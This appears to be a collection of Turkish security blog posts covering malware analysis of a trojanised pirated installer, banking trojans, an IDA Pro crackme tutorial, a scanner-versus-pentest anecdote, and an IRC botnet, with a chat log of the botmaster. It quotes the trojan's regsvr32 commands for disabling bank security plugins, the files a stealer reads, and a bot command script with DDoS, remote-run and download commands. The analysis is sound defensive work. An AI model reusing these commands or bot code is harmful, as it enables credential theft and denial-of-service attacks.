Korsan Yazılımlardaki Tehlike
|
|
|
- Osman İnanç
- 9 yıl önce
- İzleme sayısı:
Transkript
1 Korsan Yazılımlardaki Tehlike Nedense korsan yazılım denilince aklıma hemen Kadıköy Yazıcıoğlu İşhanı gelir. Orta okul yıllarında ( ) usanmadan sıkılmadan her haftasonu arkadaşlarla buluşup yeni oyun almak için oraya giderdik. Önüne koca koca tezgahlar kurulur, yazılım, oyun, video ne ararsak bulurduk. O zamanlar ne bittorrent ne de başka p2p programları vardı. Warez sitelerden dial-up bağlantı ve 28k modem ile indirmekte peygamber sabrı gerektirirdi. Aradan yıllar geçtikçe öğrendik korsanın ne demek olduğunu, neden emek hırsızlığı olduğunu, neden ülke ekonomisine ve sektöre zarar verdiğini. Her ne kadar günümüzde korsanla mücadelede büyük adımlar atılıyorda olsa eski yıllara kıyasla bağlantı hızlarının yüksek olması, dosya paylaşım sitelerinin çokluğu ve torrent programlarının neredeyse işletim sistemleri ile kurulu geliyor olması nedeniyle paylaşım kolaylaşıyor, mücadele ise zorlaşıyor. Emek hırsızlığıydı, ekonomiye zararıydı bir kenara, günümüzde korsan yazılım kullanmamanız için çok büyük bir neden daha var, korsan yazılımla gelen zararlı yazılımlar. Art niyetli kişiler çoğunlukla zararlı yazılımlarını yaymak için o gün için popüler olan sistemleri (misal facebook üzerinden yayılan trojan), insanlanları kandırmak için popüler isimleri veya güncel olayları kullanmayı severler. Korsan yazılım kullanımın yüksek olduğu son yıllarda bu yazılımların art niyetli kişilerin ciddi anlamda hedefi haline ne zaman geleceğini merak eder dururdum. Yine bir rutin zararlı yazılım kontrolü amacıyla göz attığım popüler paylaşım sitesinden rastgele bir paket indirdim. Paketi açtığımda her zamanki gibi içinden 1 kurulum dosyası ve bir de keygen dosyası çıktı.
2 Kurulum dosyasını çalıştırdığımda güvenlik duvarı GoogleUpdate.exe programının bir ip adresi ile haberleşmek istediği uyarısını verdi. Şüpheli bu durum karşısında kurulum paketi tarafından oluşturulan kurulum paketlerine göz atmaya karar verdim. %temp% klasörü içinde oluşturulan ve bu pakete ait olan klasörün içine baktığımda dosya isimleri şüphe duymama yetti.
3 Kurulumu tekrar başlatıp Procmon ile setup.exe, update.exe, updater.exe ve googleupdate.exe için filtrele hazırladıktan sonra updategillerin davranışlarını yakından inceledim. updater.exe 196 CreateFile C:\Documents and Settings\Administrator\Application Data\GoogleUpdate.exe updater.exe 196 RegSetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Run\GoogleUpdate update.exe 3224 CreateFile C:\Program Files\Trillian\users\default\msn.ini update.exe 3224 CreateFile C:\Program Files\Trillian\users\default\aim.ini update.exe 3224 CreateFile C:\Program Files\Trillian\users\default\yahoo.ini update.exe 3224 CreateFile C:\Documents and Settings\Administrator\Application Data\.purple\accounts.xml update.exe 3224 CreateFile C:\Documents and Settings\All Users\Application Data\DynDNS\Updater\config.dyndns update.exe 3224 QueryEaInformationFile C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data update.exe 3224 CreateFile C:\Documents and Settings\Administrator\Application Data\chrtmp update.exe 3224 CreateFile C:\Documents and Settings\Administrator\Application Data\Opera\Opera\wand.dat update.exe 3224 CreateFile C:\Documents and Settings\Administrator\Application Data\FileZilla\recentservers.xml update.exe 3224 CreateFile C:\Documents and Settings\All Users\Application Data\FlashFXP\3\Sites.dat
4 update.exe 3224 CreateFile C:\Documents and Settings\Administrator\Application Data\GlobalSCAPE\CuteFTP Pro\8.0\sm.dat update.exe 3224 CreateFile C:\Documents and Settings\Administrator\Application Data\GlobalSCAPE\CuteFTP Home\8.0\sm.dat update.exe 3224 CreateFile C:\Documents and Settings\Administrator\Application Data\GlobalSCAPE\CuteFTP Lite\8.0\sm.dat GoogleUpdate.exe 320 CreateFile C:\Documents and Settings\Administrator\Local Settings\Temp\dclogs.sys GoogleUpdate.exe 320 CreateFile C:\Documents and Settings\Administrator\Cookies\index.dat GoogleUpdate.exe 320 CreateFile C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat Daha kurulum penceresi gelmeden sistemimdeki bir çok programa bu kadar ilgi ve alaka göstermesi ve başlangıçta çalışmak sistemde değişiklik yapması kurulum dosyasının zararsız olmadığını kanıtlıyor gibiydi. Wireshark ile trafiği incelediğimde program şüpheli iki alan adı ile iletişime geçmeye çalışıyordu. Bunun üzerine ek olarak %temp% klasörü altında bulunan dclogs.sys dosyasını açtığımda tuş kayıtlarım ile karşılaştığıma hiç şaşırmadım.
5 Kurulum dosyası tarafından oluşturulan klasör içinde yer alan DoctoR.qsp dosyasını açtığımda ise kurulum dosyasının (setup.exe) özel olarak oluşturulduğunu ve kurulumda orjinal programa ilave olarak tuş kayıt bilgilerini çalmak üzere hazırlanmış olan update.exe ve updater.exe adındaki iki trojanıda çalıştırmak üzere hazırlanmış olduğunu gördüm. Arg =setup.exe Arg =update.exe Arg =updater.exe C:\Documents and Settings\Administrator\Application Data\chrtmp dosyasına SQLite Database Browser ile göz attığımda internet tarayıcısı tarafından kayıt altına alınan bilgileride çaldığını öğrenmiş oldum.
6 Son olarak Virustotal sonuçlarına baktığımda ise bunların zararlı yazılım oldukları konusunda artık hiç şüphem kalmamıştı. ( update.exe, updater.exe, googleupdate.exe ) Sonuç olarak günümüzde korsan yazılımlarında art niyetli kişilerin hedefi haline geldiğini, ülke ekonomisini düşünmeyenlerin en azından kendi sistemlerinin, verilerinin güvenliği için lisanslı yazılımlar kullanmaları gerektiğinin altını bu vesileyle çizmek isterim. Bir sonraki yazıda görüşmek dileğiyle herkese güvenli haftalar dilerim. Trojan Haftası Müşterilerinden gelen ihbarlar nedeniyle bankalar geçtiğimiz haftaya hızlı başladılar. Özellikle Salı gününe MIB (Man in the mobile) saldırısı gerçekleştirebilen Zeus trojanı damgasını vurdu. Yaklaşık 1 ay önce Netsec in 35. sayısında bu trojana değinmiş ve yakın zamanda bu yöntemi kullanan trojanlar ile karşılaşabileceğimizi belirtmiştim ki çok geçmeden Türkiye deki bazı bankaları hedef alarak ortaya çıkıverdi. Gelen ihbarların çoğu bankaların internet bankacılığı giriş sayfasında şüpheli bir pencerenin açıldığı, TCKN ve cep telefonu bilgilerinin istendiği
7 yönünde oldu. Daha sonra gelen ihbarlar ise cep telefonuna bir sms gönderildiği ve mesajda bir adresin yer aldığı ve bu adresteki zararlı yazılımı kuran kişilerin internet bankacılığına girişte ve bankacılık işlemlerinde kullanmış oldukları SMS kodlarının çalındığı yönünde oldu. İlk başta işin içinde tek bir trojanın olduğunu düşünülsede çok geçmeden farklı kaynaklardan toplanan bilgiler bir araya getirilerek iki farklı trojanın olduğu ortaya çıktı. Trojanlardan biri, kullanıcının, trojanın üzerinde tanımlı olan PTT (interaktif posta çeki sayfası), Paypal, bir hacking forumu ve 19 tane bankaya ait olan internet bankacılığı sayfalarından bir tanesine girmesi durumunda kullanıcı adı ve şifresini çalıyor, ekran görüntülerini diske kayıt ediyor ve eğer ziyaret edilen site bu 19 bankadan bir tanesinin internet bankacılığı sitesi ise ilave olarak yeni bir pencere açarak TCKN ve cep telefonu bilgilerini alıyor ve bir ftp sunucusuna gönderiyor diğeri ise, namı diğer Zeus, internet bankacılığı kullanıcı adı ve şifresini çalmakla yetinmeyip kullanıcıdan cep telefonu numarası, cep telefonu marka ve model bilgilerinide isteyerek cep telefonuna zararlı bir yazılım, trojan göndererek cep telefonuna gelen SMS leri çalıyordu. TCKN ve cep telefonu bilgisi toplayan trojan, e-posta yolu ile yayılıyor ve bilgi güvenliğinin en zayıf halkası olan insanı istismar ediyordu. Rar dosyası açıldığında içinden video.haberturk.com adında bir dosya çıkıyordu. 2 Kasım tarihinde dosyayı VirusTotal sitesinde tarattığımda sadece 5 tane antivirüs (DrWeb, Sunbelt, Panda, Kaspersky, Prevx), 3 Kasım tarihinde tarattığımda ise 6 tane antivirüs (DrWeb, Sunbelt, Panda, Kaspersky, Prev, NOD32) bunu zararlı yazılım olarak tespit ediyordu. (Şu an itibariyle ise sadece 9 tane antivirüs (DrWeb, Sunbelt, Panda, Kaspersky, McAfee, McAfee-GWEdition, Fortinet, AntiVir, NOD32) bu dosyayı tanıyor.) TCKN ve cep telefonu bilgisi toplayan trojana ait dosyaları statik olarak
8 analiz ettiğimde; Video.haberturk.com dosyasının Delphi programlama dili ile programlandığını, Son olarak 1 Kasım tarihinde değiştirildiğini, ftp.my3gb.com sunucusuna (ftp şifresi değiştiği ve my3gb yöneticileri tarafından hesap silindiği için sunucu adını ifşa ediyorum) bağlanma ihtimali olduğunu, Kayıt altına alınan ve sunucuya gönderilen dosyaların başkaları tarafından çalınmaması adına ftp kullanıcı adı, şifre, port ve bazı bilgileri şifreleyerek sakladığını söyleyebilirim. Dinamik olarak analiz ettiğimde ise; Çalıştırılır çalıştırılmaz windows\system32 klasörü altında javascheds.exe adında bir dosya, windows\system32\drivers klasörü altında ise ie_plugin.exe adında başka bir dosya oluşturduğunu, Windows\system32\drivers klasörü altında security adında gizli bir klasör oluşturarak içine 19 tane bankanın logosunu resim dosyası olarak kayıt ettiğini, Tuş kayıt bilgilerini C:\WINDOWS\system32\wins\syskl32.sys dosyasına kayıt ettiğini, İnternet bankacılığına giriş esnasında aldığı ekran görüntülerini C:\WINDOWS\system32\wins\setup klasörü altına kayıt ettiğini, ie_plugin.exe dosyasının UPX ile paketlenmiş olduğunu, DDE yöntemi ile bu 19 bankaya ait internet bankacılığı adreslerini izlediğini ve bu adreslere girilmesi durumunda TCKN ve cep telefonu bilgisi toplayan ve ilgili bankanın logosunu içeren bir pencere oluşturduğunu, tuş kaydı yaptığını ve ekran görüntüsü aldığını Güvenlik kalkanı ve güvenli girişi devre dışı bıraktığını, Sadece internet explorer ve firefox internet tarayıcılarını desteklediğini, Kayıt altına aldığı ekran görüntülerini ve tuş kayıtlarını ftp.my3gb.com sunucusuna göndermeye çalıştığını (ftp şifresi değiştiği ve my3gb yöneticileri tarafından hesap silindiği için sunucu adını ifşa ediyorum), TCKN bilgisi aldığı ekranda tckn algoritmasından faydalanarak doğrulama yaptığını ve hatalı tckn girilmesi durumunda hata mesajı çıkarttığını, Startup klasörüne SunJavaUpdateSched kısayolu oluşturduğunu, Trojan da bug olduğunu, firefox.exe dosyasını ortam değişkenlerinden (environment variable) PATH değişkeninde yer alan tüm klasörlerde teker teker aradığını fakat hiç bir zaman bulamayacağını çünkü firefox un kurulum esnasında klasör bilgisini PATH değişkenine eklemediğini, sürekli arama işlemi gerçekleştirmesi nedeniyle yüksek CPU tüketimine yol açtığını :p Bankalara ilave olarak PTT, Paypal ve bir hacking forumuna giriş esnasında ekran görüntüleri aldığını, 10 Aralık 2009 tarihinde analiz ettiğim zararlı yazılımın yeni bir varyantı olduğunu söyleyebilirim. Güvenli girişi kaldırma girişimleri: cmd.exe + command.com /c regsvr32 /u /s %WINDIR%/Downloaded Program Files/tebedit.ocx Güvenlik kalkanını kaldırma girişimleri: cmd.exe + command.com /c regsvr32 /u /s %WINDIR%/Downloaded Program Files/JaguarEditControl.dll
9 cmd.exe + command.com /c regsvr32 /u /s %WINDIR%/Downloaded Program Files/JaguarEdit4ISB.dl Efsane Zeus trojanına gelecek olursam elimde analiz edebilecek bir numune olmadığı için duyduklarımı ve gördüklerimi sizinle paylaşabilirim. Bana cep telefonuna bulaşan bir trojan varmış diye söylediklerinde hemen aklıma bunun man in the mobile yapabilen Zeus trojanı olduğu geldi ve konuyla ilgili biraz daha bilgi edindiğimde bulaşma yöntemininde aynı olduğu öğrendim. Kullanıcıdan cep telefonu numarası, marka ve model alınıyor ve daha
10 sonrasında sms ile bir web adresi gönderiliyor ve kullanıcı bu adresteki zararlı yazılımı yükler yüklemez artık cep telefonuna gelen SMSler (amaç internet bankacılığına giriş ve işlemler esnasında kullanılan SMS kodunu çalmak) gizlice (sms geldiği zaman cep telefonu size haber vermiyor) art niyetli kişilere gönderiliyordu. Buraya kadar herşey normaldi fakat ne zaman ki Zeus bulaşmış bir kullanıcıya ait ekran görüntüsü gördüm o zaman gözlerime inanamadım çünkü basit bir html injection ile sunucudan gelen yanıta bir form eklendiğini düşünürken çok farklı bir sahne ile karşılaştım. Aklınızda canlandırabilmeniz adına her zaman girmiş olduğunuz internet bankacılığı uygulamasını düşünün ve girer girmez tasarım aynı, tüm menüler yerli yerinde, butonlar, font herşey orjinali ile aynı tek fark yeni bir mesaj ile karşılaşıyorsunuz. Mesajın içeriği oldukça başarılı kısaca sizi dolandırıcılıktan koruyacağını vaad eden bir sertifikayı cep telefonunuza yüklemeniz konusunda kandırmaya çalışıyor. Mesajı okuduğunuz zaman yazım hataları ve düşük cümleler sadece sizde şüphe uyandırıyor. Orjinal ekran görüntüsünü etik açıdan paylaşmam doğru olmayacağı için sadece mesajı sizlerle paylaşıyorum. Açıkçası insan bu mesajı okuduktan sonra vay canına beni bile kandırırdı diye düşünmeden edemiyor. Zeus un MIB yöntemini kullanan sürümünün yurt dışında keşfedilmesinin üzerinden daha 1 ay geçmeden bu kadar kısa bir süre içinde Türkiye de ortaya çıkmasını beklemiyordum. Tüm bankaların SMS OTP kullandığı günümüzde umarım ilerleyen zamanlarda çok daha fazla banka müşterisini hedef alan bir trojan ile karşılaşmayız. Bir sonraki yazıda görüşmek dileğiyle herkese güvenli günler dilerim. IDA Pro ile Remote Linux Debugging Windows bağımlısı biri olarak benim dünyamda Linux, hep sanal makina içinde çalışmaya mahkum olmuştur. Her ne kadar Ubuntu yu çok seviyor olsamda
11 alışkanlık ve oyunlar nedeniyle Windows kullanmaya uzun bir süre daha devam edeceğim gibi duruyor. Windows üzerinde debug için Ollydbg, Immunity Debugger ve IDA Pro araçlarını sıkça kullanıyorum fakat sistem Linux olunca GDB kullanmak gerçekten grafik arayüzü olmaması nedeniyle can sıkıcı olabiliyor. Fakat benim gibi sadece tek bir işletim sistemi kullanmıyor sanal makinalardanda faydalanıyorsanız Linux üzerindeki bir programı debug etmek için IDA Pro nun uzaktan (remote) debug özelliğinden faydalanabilirsiniz. Remote debugging, yerel veya uzaktaki ağ üzerinde yer alan bir sistemde çalışan bir programı kendi sisteminiz üzerinden debug etmenizi sağlar bu sayede örnek olarak uzak sistemde çalışan zararlı bir yazılımı kendi sisteminize zarar vermeden analiz etme imkanınız olmuş olur. Benim gibi ana sistem olarak Windows 7 kullanıyorsanız ve sisteminizde IDA Pro v5.x yüklü ise şu adımları izleyerek Linux üzerindeki renksiz GDB ye güzel bir alternatifiniz olabilir :) Yazının daha kolay anlaşılabilmesi için örnek olarak Linux için hazırlanmış bir crackme programını debug edeceğiz. Crackme, tersine mühendislik becerilerinizi geliştirebilmeniz için internet üzerindeki gönüllüler tarafından kırılmak üzere hazırlanmış programlara verilen isimdir. İlk olarak Crackmes.de sitesinden cyrex s Linux CrackMe programını indirelim ve C:\Program Files\IDA\crackme klasörü içine arşivden çıkartılmış halini kopyalayalım. Öncelikle uzaktan debug etmek için Windows sisteminiz üzerinde ida adında bir kullanıcı yaratmanızı tavsiye ederim. Kullanıcıyı yarattıktan sonra C:\Program Files\IDA klasörünü paylaşıma açalım ve IDA kullanıcısını bu paylaşım üzerinde yetkilendirelim. Daha sonra sanal makina içinde yüklü olan Ubuntu ya geçerek (evet herkes Ubuntu kullanmalı :p) bulunduğumuz klasör altında ida klasörü yaratalım ve arından smbmount komutu ile az önce yaratmış olduğumuz paylaşıma bağlanarak bu klasör içinde yer alan linux_server programını çalıştıralım.
12 Daha sonra Windows a geçerek IDA yı çalıştıralım ve File menüsünden Open a basarak C:\Program Files\IDA\crackme klasörü içinde yer alan crackme programını açalım. Daha sonra üstteki menüden Debugger ı seçelim ve daha sonra Remote Linux Debugger ı seçelim. Ardından Debugger menüsünden Start process i seçelim ve Hostname kısmına sanal makina içinde çalışan Ubuntu sisteminin IP adresini girelim.
13 IP adresini girdikten sonra ise Debugger menüsünden Start process i seçerek debug işlemini başlatalım. (Her iki uyarı mesajınıda Yes diyerek geçebiliriz.) Crackme yi kırmak için bizden doğru şifreyi bulmamız isteniyor. Debug işlemi başladıktan sonra Ubuntu ya bakacak olursanız ekranda sizden doğru şifreyi girmenizi istediğini görebilirsiniz. Buraya rastgele bir şifre girdiğimizde (12345) hata mesajı ile karşılaşıyoruz ve debug işlemi sonlanıyor. Amacımız doğru şifreyi bulmak olduğu için bunun için IDA da Shift 12 tuşlarına basarak Strings penceresini açalım ve az önce karşılaştığımız hata mesajının üzerine iki defa basarak program üzerinde bu değişkenin tutulduğu ilgili bölüme gidelim. Faremizin imlecini char aohhhhyourskill[] üzerine getirdikten sonra x tuşuna basarak bu değişkeni çağıran kod parçasına gidelim.
14 Bu kodun üzerine hızlıca göz attığımızda kullanıcıdan alınan verinin yani şifrenin strcmp fonksiyonu yardımı ile 47ghf6fh37fbgbg değeri ile karşılaştırıldığını ve doğru olması durumunda Good ile başlayan mesaja aksi durumda Ohhh ile başlayan hata mesajına gittiğimizi görüyoruz ve şifrenin 47ghf6fh37fbgbg olduğunu öğrenmiş oluyoruz ve crackme başarıyla çözülmüş oluyor.
15 Gördüğünüz üzere Windows üzerinde çalışan IDA ile Linux üzerindeki bir programı debug etmek GDB nin aksine daha kolay ve eğlenceli olabiliyor. Bir sonraki yazıda görüşmek dileğiyle herkese iyi haftalar dilerim. Not: Geçtiğimiz aylarda yayınlanan v6 sürümü ile IDA Pro kullanıcıları Linux ve Mac OS X üzerinde GUI arayüzüne kavuştu. Gaarrkkk Bir kaç gün önce geceleri rahat uyku uyumanıza yardımcı olan binlerce dolarlık web uygulama güvenlik tarayıcılarının basit bir güvenlik zafiyetini tespit etmekte ne kadar başarısız olduğuna ve bir kurum için 3. parti penetrasyon testlerinin, 3. bir gözün ne kadar değerli olduğuna bir kez daha tanık oldum. Bir web uygulaması düşünün bu zamana dek web uygulama güvenlik tarama araçlarının ağır topları (HP Webinspect, IBM Appscan, Acunetix ve Netsparker) ile taranmış ve sql injection güvenlik zafiyeti adına bir tane bulgu ortaya çıkmamış. Uygulama oldukça büyük, ister istemez zaman ve kaynak kısıtlarından ötürü manual olarak siteyi baştan aşağıya test etmek mümkün değil. Durum böyle oluncada iş testi gerçekleştiren bilişim güvenlik uzmanlarının Jedi sezgisine ve kullanmış olduğu araçların becerisine kalıyor. Gerçekleştirilen bu testlerde de olabildiğince fazla araç kullanmakta her zaman fayda var çünkü bir aracın bulamadığı bir
16 güvenlik zafiyeti diğer bir araç, diğer iki aracın bulamadığı bir güvenlik zafiyetini ise diğer araç bulabiliyor. Tabii ki hiç bir araç manual testlerin yerini alamıyor ve yakın gelecektede almasını beklemiyorum. Gün geliyor bu uygulama, yerli bir firmadan alınan penetrasyon testi hizmetinin kapsamına alınıyor. Tüm güvenlik mekanizmaları devre dışı bırakıldıktan sonra whitebox penetrasyon testi başlıyor ve çok geçmeden bu uygulama üzerinde zaman tabanlı blind sql injection güvenlik zafiyeti tespit ediliyor. Her ne kadar manual testlerin yerini hiç bir araç alamıyor olsada bu kadar üst düzey araçlar ile taranan bir uygulamada nasıl oluyorsa bu zafiyet keşfediliyor sorusu akıllara gelen ilk soru oluyor. Sorunun cevabı ise deyim yerindeyse samanlıkta iğne bulan bilişim güvenlik uzmanının Jedi sezgisi ve bu güvenlik zafiyetini tespit etmesini sağlayan 149 Pound değerindeki Burp Suite PRO aracı oluyor. Bu anekdottan kurumlar ve bilişim güvenlik uzmanları kendileri için şu dersleri çıkarabilirler; 3. parti penetrasyon testlerinin önemi Binlerce dolarlık ticari araçlara çok fazla güvenmemek gerektiği Manual testlerin önemi Güvenlik testlerinde olduğunca fazla araçtan faydalanmak gerektiği Bir sonraki yazıda görüşmek dileğiyle şimdiden herkese iyi haftasonları dilerim. Not: Yazının başlığı neden mi Gaarrkkk? İşte yanıtı :) Güncelleme ( ): Netsparker dışındaki ürünler ile gerçekleştirilen testleri bizzat doğrulama imkanım olmuştu fakat Netsparker lisansım olmadığı için testi denetçi gerçekleştirmiş ve bulamadığını iletmişti bende buna istisneden listeye Netsparker ürününüde eklemiştim. Ferruh ile yaptığım görüşmeler neticesinde Netsparker ürünü ile aynı testi bizzat gerçekleştirme imkanım oldu ve ürünün bu zafiyeti tespit edebildiğine tanık oldum. Denetçi ile yaptığım son görüşmede ise siteyi baştan sona Netsparker ile taratmadığını proxy modunda zafiyete sahip olan bölümü tarattığını öğrendim ve proxy modunda uygulamayı test ettiğimde bu zafiyeti bulamadığını teyit ettim. Son durumda Netsparker ın bu zafiyeti tam tarama seçeneği ile başarıyla tespit edebildiğini, proxy modundayken tespit edemediğini söylemek isterim, kullananlara duyurulur. Botnet Gerçeği
17 Geçtiğimiz günlerde üzerinden yayınlanan bir kaç zararlı yazılımı (timunun.exe, scan.exe) incelediğimde karşıma yerli malı ddos saldırı özelliğine sahip, irc ve msn üzerinden haberleşebilen bir trojan çıkıverdi. Trojanın aldığı komutları incelediğimde reklam yapmadan, saldırı yapmaya kadar bir çok özelliği üzerinde barındırdığını gördüm. if ($1 =!reklam) {.set %reklam $2- } if ($1 =!packet) { if ($2 = ddos) { //set %pchan # if ($4 == random) { //fckrstart $3 $4 $r(1,65000) halt } //fckrstart $3 $4 $5 } } if ($1 =!Atak) { if ($2!== $null) { srvmsg (Packet) (Yollaniyor) $2 Üzerinde $3 Toplam $4 Packet synp start $4 $2 $3 } } if ($1 =!nreklam) { msg #x %reklam } if ($1 =!mesajnick) {.set %mesajnick $2- echo -a #x Yeni Mesaj Atilacak Nick %mesajnick } if ($1 =!mesaj) {.mesaj } if ($1 =!settimer) {.set %timer $2- } if ($1 =!timer) {.timer31 %timer $2- } if ($1 =!timeroff) {.timer31 off } if ($1 =!gir) {.girgir } if ($1 =!Run) { srvmsg Running : $2-.run $2- } if ($1 =!qir) {.girulen $2- } if ($1 =!q) { $2- } if ($1 =!Version) {.Anlat } if ($1 =!Down) {.Download $2- } if ($1 =!download) {.msg #x 4,1 I14,1c4,1eSh14,1o4,1cK Lamer Koruması.. /server irc.xxxx.tr } if ($1 =!Clone) {.Clone $2- } if ($1 =!IdentClone) {.identclone $2- } if ($1 =!HideControl) { if ($appactive == $true) { msg #x Mirc Açik } else { msg #x Mirc Kapali } } if ($1 =!Hide) {.dll ice32.dll do_showwindow $window(-2).hwnd 0 } Trojanın konfigürasyon dosyasında yer alan IRC sunucusuna bağlandığım zaman ilk bakışta boş görünen bir sunucu olarak görünsede çok geçmeden botmaster ile yaptığım sohbet esnasında sunucu üzerinde tam tamına adet bot olduğunu ve bunların sadece 500 TL ye kiralanabildiğini öğrendiğimde DDOS izleme ve önleme sistemlerinin önemi benim için daha da artmış oldu. DDOS izleme ve önleme sistemlerini hayata geçirme konusunda kurum veya kuruluşlarınızda henüz bir ilerleme kaydetmediyseniz, yöneticilerinizi ikna etme adına örnek bulmakta zorlanıyorsanız sizlere yardımcı olma adına botmaster ile gerçekleştirmiş olduğum sohbeti sizlerle paylaşıyorum. Unutmadan, her ne kadar 41 antivirüs üreticisinden 31 tanesi bu zararlı yazılımları (timunun.exe, scan.exe, imbot.exe) tespit ediyor olsada antivirüs politikalarınızdaki istenmeyen program politikalarına bu dosyaları eklemenizde fayda olabilir. Bir sonraki yazıda görüşmek dileğiyle [20:32] [20:33] [20:34] [20:34] [20:35] [20:35] [20:35] [20:35] [20:35] <MS> güzel bot olmuş <MS> hoşuma gitmedi desem yalan olur <MS> çok fazla kişiye bulaşmamış ama sanırım <********> bulaştır o zaman <MS> yok yahu o benim işim değil <********> senin işin ne <MS> ben sadece bu tür zararlı yazılımları inceliyorum <MS> kendin mi yazdın bu fuckers.jpg içinde yer alan tüm scripti? <********> evet
18 [20:36] [20:36] [20:37] [20:37] [20:37] [20:37] [20:38] [20:38] [20:38] [20:38] [20:38] [20:39] [20:39] [20:39] [20:39] [20:40] [20:44] [20:45] [20:45] [20:45] [20:45] [20:45] [20:45] [20:46] [20:46] [20:47] [20:48] [20:48] [20:48] [20:48] [20:52] [20:52] [20:54] [20:54] [20:54] [20:54] [20:55] ziyaret [20:55] [20:55] [20:55] [20:55] [20:55] [20:56] [20:56] [20:56] [20:56] [20:57] [20:57] [20:57] [20:57] [20:59] [21:00] [21:00] [21:00] [21:01] [21:01] [21:01] [21:01] [21:02] [21:03] [21:03] [21:03] [21:03] [21:03] [21:03] [21:03] [21:03] <MS> araklamadın yani? <********> araklamışta olabilirim tam hatırlamıyorum çok eski <MS> HTTP1.4 nedir bunuda ilk defa gördüm <********> diğer gördüklerin neydi <********> roxnet mi <MS> yok roxnetide ilk defa duydum <********> bu HTTP de oper olmadan sunucuda hiçbir işlem yapamıyosun <********> diğer Lerinden çok kolay bot çalınıyor <MS> kanaldakileride göremiyorsun sanırım <MS> evet güzel bir yöntemmiş <MS> http1.4 ü nereden indirebilirim? <********> google <********> bulabilirsin oradan <********> botnetmi besliceksin <MS> yok hayır sadece nasıl çalıştığını merak ettim <MS> google yapmıştım ama bulamamıştım <MS> scan.exe ile imbot.exe ne iş yapıyor <********> scan exe <********> ispiyoncu bot özelliği var <********> bilgisayardaki diğer virüsleri bulup <********> hangi serverda beslendiklerini <********> veriyor <********> imbot exe ise msn ve facebook şifresi veriyor <MS> bunları sen mi yazdın? <********> ewet <MS> hangi crypterı kullandın? <********> arkadaşa packer yaptırmıştım <********> hmm <********> sende varmı crtptr <MS> yok maalesef <MS> kimin? <********> packer yapan arkadaşın <MS> bu işi neden yapıyorsun? para kazanıyor musun? <********> evet hazır kurulu düzen olarak satıyorum isteyen kişilere <********> alan kişiler farklı amaçlar için kullanıyor <MS> mesela ne gibi amaçlar? <********> mesela web sitesi olan sitesini günde binlerce kişiye ettirebiliyor <MS> hitten para kazanıyor <********> kimisi rakip siteye saldırı yaparak o siteyi çökertiyor <MS> ne zamandan beri bu işlerle uğraşıyorsun? <********> kimisi irc serverlere saldırı yapıyor <MS> ne kadar kiralama raici? <********> 500 TL <********> isteğe göre değişiyor <MS> aylık mı yıllık mı <********> ömür boyu elinin altında bulunucak şekilde <MS> yakalanma korkunuz yok mu? <********> :p <MS> mesela ya ben polis olsaydım <********> Sonunu düşünen kahraman olamaz <MS> alıcı var demek ya sözde fakirleşmiştik halk olarak ama :) <MS> yai kaç arası mı? <MS> yaş demek istedim <********> 24 <MS> öğrenci değilsin sanırım? <********> değilim <MS> ne kadar süredir bu işlerle uğraşıyorsun? <********> 6-7 Sene <MS> bu zamana kadar bu işten ne kadar para kazanmışsındır kabaca? <********> oturduğum ev araba <********> yediğim içtiğim vs vs. <********> ;) <MS> o kadar diyorsun yani <********> 50k <********> 25k Lık botnetler <********> satıyorum <MS> inanması zor kanalda 1 tane var sadece
19 [21:04] <********> kanal +u [21:04] <********> sadece op olan kişiyi görebilirsin [21:04] <********> ;) [21:04] <MS> komutuna 1 tanesi yanıt verdi [21:04] <********> kanal +Mm [21:05] <********> sadece o bot kanalda op [21:05] <********> kanal +Mm modunda olduğu için [21:05] <********> diğerleri yazamaz [21:05] <MS> bende tek op sen görünüyorsun ondan dedim [21:05] <MS> bu kanalda şimdi kaç bot var? [21:05] <********> 403 [21:11] <MS> xxxx'da kaç bot var? [21:11] <********> 895 [21:11] <********> toplamda 25 bin bot var [21:11] <********> resim göndericektim sana [21:11] <********> dur upload edebilirim [21:12] <MS> sunucunu kapatacaklardır yakında [21:12] <********> kapatsınlar yenisini açarım 10 dakkamı almaz [21:12] <********> ;) [21:12] <MS> botlara konfigürasyon nasıl geçeceksin? [21:12] <MS> haberleşme? [21:13] <********> ;) [21:50] <MS> bu botların hepsi türkiyeden mi? [21:50] <********> * [RUS ] (XP-3602@ ) Quit (Connection reset by peer) [21:50] <********> * [TUR 00 M 94088] (XP-9592@ ) has joined #xxx [21:50] <********> * [TUR 00 MP 1458] (XP-2438@ ) has joined #xxx [21:50] <********> * [USA 00 M 15992] (XP-2325@ ) Quit (Ping timeout) [21:50] <********> * [ESP 00 MP 5424] (XP-9571@ ) has joined #xxx [21:50] <********> * [TUR ] (XP-4760@ ) Quit (Connection reset by peer) [21:50] <********> * [RUS 00 D 20753] (XP-3227@ ) Quit (Connection reset by peer) [21:50] <********> * [RUS 00 UD 07067] (XP-6066@ip nwgsm.ru) Quit (Ping timeout) [21:50] <********> * [ESP 00 D 45749] (XP-8229@ ) Quit (Ping timeout) [21:50] <********> * [TUR 00 M 94088] (XP-9592@ ) Quit (Ping timeout) [21:50] <********> * [TUR 00 P 78342] (XP-1906@ ) Quit (Connection reset by peer) [21:50] <********> * [ESP 00 D 46676] (XP-7788@ ) has joined #xxx [21:50] <********> * [ESP 00 M 58294] (XP-2335@host telecom.net.ar) has joined #xxx [21:50] <********> * [BRA 00 P 30821] (XP-9933@ ) has joined #xxx [21:50] <********> * [TUR ] (XP-1993@ ) Quit (Ping timeout) [21:50] <********> * [TUR 00 M 10638] (XP-0056@ ) has joined #xxx [21:50] <********> * [TUR 00 P 17537] (XP-9032@ ) has joined #xxx [21:50] <********> * [TUR 00 M 70509] (XP-8216@ ) Quit (Connection reset by peer) [21:50] <********> * [TUR 00 P 84223] (XP-2377@ ) has joined #xxx [21:50] <********> * [ESP 00 D 46676] (XP-7788@ ) Quit (Ping timeout) [21:50] <********> * [ESP 02 MP 3357] (XP-9120@ ) has joined #xxx [21:50] <********> * [ESP 00 M 58294] (XP-2335@host telecom.net.ar) Quit (Ping timeout) [21:50] <********> * [PRT 00 MD 2372] (XP-0409@ ) Quit (Connection reset by peer) [21:50] <********> * [TUR 00 M 81825] (XP-0312@ ) has joined #xxx [21:50] <********> * [USA 00 P 53894] (XP-6659@cpe elp.res.rr.com) Quit (Connection reset by peer)
